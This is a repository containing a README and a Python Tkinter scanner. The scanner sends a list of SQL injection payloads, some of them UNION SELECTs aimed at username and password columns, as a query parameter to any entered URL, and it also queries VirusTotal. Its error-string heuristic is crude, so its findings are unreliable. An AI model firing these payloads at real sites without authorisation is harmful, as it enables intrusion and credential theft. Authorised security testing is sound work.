├── GUI.png ├── output.png ├── README.md └── bestversion.py /GUI.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Illusivehacks/Link-vulnaribility-scanner-/HEAD/GUI.png -------------------------------------------------------------------------------- /output.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Illusivehacks/Link-vulnaribility-scanner-/HEAD/output.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 🌐 Advanced Website Vulnerability Scanner 2 | 3 | ![GUI Preview](GUI.png) 4 | 5 | ## 🚀 About the Project 6 | 7 | The **Advanced Website Vulnerability Scanner** is a comprehensive tool that allows users to analyze websites for potential vulnerabilities. It provides insights into website security by: 8 | - Testing for **SQL Injection** and **Cross-Site Scripting (XSS)** vulnerabilities. 9 | - Fetching and displaying full **HTML** and **JavaScript** code. 10 | - Checking URLs against **VirusTotal** for threat detection. 11 | 12 | Designed with a modern and aesthetic **Tkinter GUI**, this tool is user-friendly and accessible to security enthusiasts and professionals. 13 | 14 | --- 15 | 16 | ## 🎯 Features 17 | 18 | 1. **Vulnerability Scanning**: Detect potential SQL Injection and XSS vulnerabilities. 19 | 2. **Code Analysis**: View and analyze full HTML and JavaScript of the target website. 20 | 3. **VirusTotal Integration**: Check URLs against the VirusTotal API for a detailed threat analysis. 21 | 4. **Result Management**: Save scan results locally for further review. 22 | 5. **Clear and Intuitive UI**: A sleek, responsive interface for effortless navigation. 23 | 24 | --- 25 | 26 | ## 💻 How It Works 27 | 28 | 1. Enter the URL you want to analyze. 29 | 2. 
Click the **Analyze** button to begin scanning. 30 | 3. View results in the scrollable text area, including: 31 | - Detected vulnerabilities. 32 | - Threat details from VirusTotal. 33 | - Full HTML and JavaScript code. 34 | 35 | 4. Save results to a text file or clear the interface for a new scan. 36 | 37 | --- 38 | 39 | ## 📸 Screenshots 40 | 41 | ### 1️⃣ **Graphical User Interface (GUI)** 42 | ![GUI Screenshot](GUI.png) 43 | 44 | ### 2️⃣ **Output Results** 45 | ![Output Results](output.png) 46 | 47 | --- 48 | 49 | ## 🛠️ Installation 50 | 51 | 1. Clone the repository: 52 | ```bash 53 | git clone https://github.com/Illusivehacks/Link-vulnaribility-scanner-.git ``` 54 | 2. Navigate to the project directory: 55 | ```bash 56 | cd Link-vulnaribility-scanner- ``` 57 | 3. Install the required dependencies: 58 | ```bash 59 | pip install -r requirements.txt ``` 60 | 4. Run the application: 61 | ```bash 62 | python bestversion.py ``` 63 | 64 | 65 | 66 | ## 🔑 Configuration 67 | Replace the default VirusTotal API key in the code with your own, and treat it as a secret: do not commit it to the repository. 68 | ```python 69 | DEFAULT_API_KEY = "your_virustotal_api_key" ``` 70 | 71 | ## ⚙️ Requirements 72 | Python 3.8 or later 73 | Required Python libraries: requests, beautifulsoup4, tkinter 74 | 75 | ## 🛡️ Disclaimer 76 | This tool is designed for educational and ethical hacking purposes only. Always obtain proper authorization before testing the security of any website. 77 | 78 | ## 🤝 Contributing 79 | Contributions are welcome! Feel free to: Mpesa express- 07438444 80 | 81 | Submit issues. 82 | Fork the repository and create pull requests. 83 | Suggest new features or improvements. 84 | 85 | ## 📄 License 86 | This project is licensed under the MIT License. See the LICENSE file for more details.
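"""bestversion.py - Advanced Website Vulnerability Scanner (Tkinter GUI).

For a single URL the tool fetches the page HTML and its scripts, sends each
entry of the payload lists below as the ``test`` query parameter and looks
for tell-tale strings in the responses, and asks the VirusTotal v3 API for a
reputation summary. Everything runs on the Tk thread; the per-request
timeout is what bounds how long the window can stay unresponsive.
"""
import os
import re
import tkinter as tk
from tkinter import filedialog, messagebox, scrolledtext
from urllib.parse import urljoin

import requests
from bs4 import BeautifulSoup

# Seconds before any outbound request is abandoned. The original VirusTotal
# calls had no timeout at all, so a stalled endpoint froze the GUI for good.
REQUEST_TIMEOUT = 10

# User-Agent values kept from the original code.
FETCH_USER_AGENT = "FullCodeFetcher/1.0"
SCANNER_USER_AGENT = "VulnerabilityScanner/1.0"

# The VirusTotal key is read from the environment instead of being committed
# to source control. A key that was ever checked in must be treated as public
# and rotated in the VirusTotal account before this build is used.
DEFAULT_API_KEY = os.environ.get("VIRUSTOTAL_API_KEY", "")

VT_API_BASE = "https://www.virustotal.com/api/v3"

# Detection probes sent as the ``test`` query parameter. Entries that modify
# state, execute OS commands or stall the server (DROP, xp_cmdshell, SLEEP)
# were removed from the original list: a detection-only scanner must not
# damage or degrade the system it checks, and the response heuristics in
# test_vulnerabilities() do not depend on them. A duplicate entry was dropped.
SQL_PAYLOADS = [
    "' OR '1'='1", "' OR 1=1 --", "' OR 1=1#", "' OR 'a'='a", "' OR 'x'='x' --",
    "' OR 'x'='x' /*", "' OR 1=1;", "' OR 1=1--", "admin' --",
    "' OR 1=1; --", "' OR 'x' = 'x'; --",
    "1' UNION SELECT null, username, password FROM users --",
    "' UNION SELECT null, username, password FROM users --",
    "'; SELECT * FROM users --",
    "'; SELECT * FROM information_schema.tables --",
    "'; SELECT 1 FROM dual --",
    "' OR 1=1 LIMIT 1; --",
    "' OR 1=1 GROUP BY CONCAT(username, 0x3a, password) --",
    "1' AND 1=1", "' AND 1=1#", "'; SHOW TABLES --",
]

# NOTE(review): the XSS payload strings did not survive extraction of this
# file (the list arrived as mostly empty strings, which match every response
# and would flag every site). Restore the list from the project repository;
# until then no XSS probes are sent.
XSS_PAYLOADS = []


def _resolve_script_url(page_url, src):
    """Return the absolute URL of a ``<script src=...>`` found on *page_url*.

    ``urljoin`` handles absolute, root-relative (``/x.js``), relative and
    protocol-relative (``//cdn/x.js``) sources. The original test
    ``"http" in src`` misclassified any path that merely contained "http"
    and produced ``page/./x.js`` style URLs for relative sources.
    """
    return urljoin(page_url, src)


def fetch_full_code(link):
    """Fetch *link* and collect its inline and external JavaScript.

    Args:
        link: URL of the page to fetch.

    Returns:
        ``(html, js)`` on success, where ``js`` is all scripts joined by a
        blank line; ``(None, message)`` when the page itself cannot be
        fetched. Callers (the GUI) rely on ``None`` to tell the cases apart.
        A script that fails to download is reported inline in ``js`` rather
        than failing the whole fetch.
    """
    headers = {"User-Agent": FETCH_USER_AGENT}
    try:
        response = requests.get(link, timeout=REQUEST_TIMEOUT, headers=headers)
        response.raise_for_status()
    except requests.exceptions.RequestException as e:
        return None, f"Error fetching the full code: {e}"

    soup = BeautifulSoup(response.text, "html.parser")
    js_code = []
    for script in soup.find_all("script"):
        if script.string:  # inline script body
            js_code.append(f"Inline Script:\n{script.string.strip()}")
            continue
        external_src = script.get("src")
        if not external_src:
            continue
        script_url = _resolve_script_url(link, external_src)
        try:
            external = requests.get(script_url, timeout=REQUEST_TIMEOUT, headers=headers)
            external.raise_for_status()
        except requests.exceptions.RequestException as e:
            js_code.append(f"External Script ({external_src}): Error fetching script - {e}")
        else:
            js_code.append(f"External Script ({external_src}):\n{external.text.strip()}")

    return response.text, "\n\n".join(js_code)


def _looks_like_sql_error(body):
    """Original SQL-error heuristic, unchanged.

    True when the response contains "SQL syntax" (case-sensitive) or "mysql"
    or "database" (case-insensitive). The last two match ordinary page text
    as well, so a hit is indicative only.
    """
    lowered = body.lower()
    return "SQL syntax" in body or "mysql" in lowered or "database" in lowered


def test_vulnerabilities(link):
    """Send each payload to *link* as the ``test`` query parameter.

    Args:
        link: URL to probe; the payload is appended as ``?test=<payload>``
            exactly as the original code did (no encoding).

    Returns:
        ``(vulnerabilities, highlighted)``: one-line findings and, in
        parallel, the payload behind each finding. Either list is
        ``["null"]`` when empty, because the GUI compares against that
        literal. On a request failure returns ``([message], ["null"])``.
    """
    vulnerabilities = []
    highlighted = []
    headers = {"User-Agent": SCANNER_USER_AGENT}
    try:
        for sql_payload in SQL_PAYLOADS:
            response = requests.get(f"{link}?test={sql_payload}",
                                    timeout=REQUEST_TIMEOUT, headers=headers)
            if _looks_like_sql_error(response.text):
                vulnerabilities.append("Possible SQL Injection vulnerability detected.")
                highlighted.append(f"SQL Payload: {sql_payload} detected in response.")

        for xss_payload in XSS_PAYLOADS:
            if not xss_payload:
                # An empty payload is a substring of every response; skip it
                # instead of reporting a finding for nothing.
                continue
            response = requests.get(f"{link}?test={xss_payload}",
                                    timeout=REQUEST_TIMEOUT, headers=headers)
            if xss_payload in response.text:
                vulnerabilities.append("Possible Cross-Site Scripting (XSS) vulnerability detected.")
                highlighted.append(f"XSS Payload: {xss_payload} detected in response.")
    except requests.exceptions.RequestException as e:
        return [f"Error testing vulnerabilities: {e}"], ["null"]

    return vulnerabilities or ["null"], highlighted or ["null"]


def check_virustotal(link, api_key):
    """Submit *link* to VirusTotal and return a human-readable summary.

    Args:
        link: URL to look up.
        api_key: VirusTotal API key; when empty the lookup is skipped.

    Returns:
        Always a string. Network, HTTP and unexpected-JSON errors are folded
        into an ``Error checking VirusTotal: ...`` message so the GUI can
        show them in place of the report.
    """
    if not api_key:
        return "VirusTotal check skipped: no API key configured (set VIRUSTOTAL_API_KEY)."

    headers = {"x-apikey": api_key}
    try:
        submit = requests.post(f"{VT_API_BASE}/urls", headers=headers,
                               data={"url": link}, timeout=REQUEST_TIMEOUT)
        submit.raise_for_status()
        analysis_id = submit.json()["data"]["id"]

        result = requests.get(f"{VT_API_BASE}/analyses/{analysis_id}",
                              headers=headers, timeout=REQUEST_TIMEOUT)
        result.raise_for_status()
        attributes = result.json()["data"]["attributes"]
    except (requests.exceptions.RequestException, ValueError, KeyError, TypeError) as e:
        return f"Error checking VirusTotal: {e}"

    # The analysis is read back immediately after submission. While it is
    # still queued the counters are all zero, which the original code
    # displayed as if it were a clean result; surface the status instead.
    status = attributes.get("status", "unknown")
    stats = attributes.get("stats", {})

    # Per-engine verdicts live under "results" on an analysis object; the
    # original key "last_analysis_results" is kept as a fallback.
    vendor_info = attributes.get("results") or attributes.get("last_analysis_results") or {}
    if vendor_info:
        vendor_details = "".join(
            f"{vendor} - {details.get('category', 'N/A')} "
            f"(last detected: {details.get('date', 'N/A')})\n"
            for vendor, details in vendor_info.items()
        )
    else:
        vendor_details = "No analysis results available."

    return (
        f"VirusTotal Threat Detection:\n"
        f"Analysis status: {status}\n"
        f"Harmless: {stats.get('harmless', 0)}, Malicious: {stats.get('malicious', 0)}, "
        f"Suspicious: {stats.get('suspicious', 0)}, Undetected: {stats.get('undetected', 0)}\n\n"
        f"Vendor Detection Details:\n{vendor_details}"
    )


def _truncate(text, limit=5000):
    """Cut *text* to *limit* characters for display, adding a blank line when cut."""
    return text[:limit] + "\n\n" if len(text) > limit else text


def create_gui():
    """Build the Tkinter window and run the main loop.

    The scan itself (``analyze_url``) performs all network calls on the Tk
    thread, so the window does not repaint until the scan finishes.
    """

    def analyze_url():
        link = url_entry.get().strip()
        if not link:
            messagebox.showwarning("Input Error", "Please enter a URL!")
            return

        html_code, js_code = fetch_full_code(link)
        if not html_code:
            # fetch_full_code() signals failure as (None, message).
            result_text.delete("1.0", tk.END)
            result_text.insert(tk.END, js_code)
            return

        vulnerabilities, highlighted_vulnerabilities = test_vulnerabilities(link)
        threat_info = check_virustotal(link, DEFAULT_API_KEY)

        result_text.delete("1.0", tk.END)
        result_text.insert(tk.END, "Full HTML Code:\n")
        result_text.insert(tk.END, _truncate(html_code))

        result_text.insert(tk.END, "\nJavaScript Code:\n")
        result_text.insert(tk.END, _truncate(js_code))

        result_text.insert(tk.END, "\nVulnerability Analysis:\n")
        for vulnerability in vulnerabilities:
            result_text.insert(tk.END, f"- {vulnerability}\n")

        if highlighted_vulnerabilities != ["null"]:
            result_text.insert(tk.END, "\nHighlighted Vulnerabilities:\n")
            for highlight in highlighted_vulnerabilities:
                result_text.insert(tk.END, f" {highlight}\n")
        else:
            result_text.insert(tk.END, "\nHighlighted Vulnerabilities: null\n")

        result_text.insert(tk.END, f"\n{threat_info}\n")

    def clear_all():
        url_entry.delete(0, tk.END)
        result_text.delete("1.0", tk.END)

    def save_results():
        result_content = result_text.get("1.0", tk.END)
        if not result_content.strip():
            messagebox.showwarning("No Content", "No results to save!")
            return
        file_path = filedialog.asksaveasfilename(defaultextension=".txt",
                                                 filetypes=[("Text files", "*.txt")])
        if file_path:
            # Explicit UTF-8: fetched HTML/JS is arbitrary Unicode and the
            # platform default codec (e.g. cp1252 on Windows) would raise.
            with open(file_path, "w", encoding="utf-8") as file:
                file.write(result_content)

    # Main window
    root = tk.Tk()
    root.title("Advanced Website Vulnerability Scanner")
    root.geometry("1200x800")
    root.configure(bg="black")

    # URL input
    tk.Label(root, text="Enter URL:", fg="white", bg="black").pack(pady=5)
    url_entry = tk.Entry(root, width=80, bg="gray", fg="black")
    url_entry.pack(pady=5)

    # Buttons, laid out horizontally
    button_frame = tk.Frame(root, bg="black")
    button_frame.pack(pady=10)

    analyze_button = tk.Button(button_frame, text="Analyze", command=analyze_url, bg="gray", fg="black")
    analyze_button.pack(side=tk.LEFT, padx=10)

    clear_button = tk.Button(button_frame, text="Clear", command=clear_all, bg="gray", fg="black")
    clear_button.pack(side=tk.LEFT, padx=10)

    save_button = tk.Button(button_frame, text="Save", command=save_results, bg="gray", fg="black")
    save_button.pack(side=tk.LEFT, padx=10)

    # Result display
    result_text = scrolledtext.ScrolledText(root, width=140, height=40, bg="black", fg="white",
                                            insertbackground="white")
    result_text.pack(pady=10)

    root.mainloop()


if __name__ == "__main__":
    create_gui()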